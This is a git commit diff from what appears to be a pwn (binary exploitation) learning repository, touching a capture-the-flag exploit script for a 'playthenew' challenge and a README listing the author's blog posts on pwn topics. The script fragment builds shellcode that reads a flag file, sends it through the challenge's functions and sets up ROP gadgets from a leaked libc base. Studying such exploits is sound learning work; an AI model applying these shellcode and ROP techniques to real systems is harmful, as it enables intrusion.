Update OtherBin/playthenew and README

This commit is contained in:
Jack Ren
2022-04-04 14:38:35 +08:00
parent 60da235775
commit 272640d3c6
2 changed files with 2 additions and 2 deletions

View File

@@ -120,8 +120,6 @@ shellcode = shellcraft.amd64.linux.cat2('flag')
secret(p64(0) + p64(gets) + p64(leak_stack - 0x110) + asm(shellcode))
backdoor()
raw_input()
pop_rdi_ret = 0x000000000002164f + libc_base
pop_rsi_ret = 0x0000000000023a6a + libc_base
pop_rdx_ret = 0x0000000000001b96 + libc_base

View File

@@ -53,3 +53,5 @@ A pwn learning repo containing multiple pwn program codes.
[Pwn学习总结25_IO_FILE io_leak](https://renjikai.com/pwn-learning-summary-25/)
[Pwn学习总结26TCache tcache231](https://renjikai.com/pwn-learning-summary-26/)
[Pwn学习总结27SmallBin playthenew](https://renjikai.com/pwn-learning-summary-27/)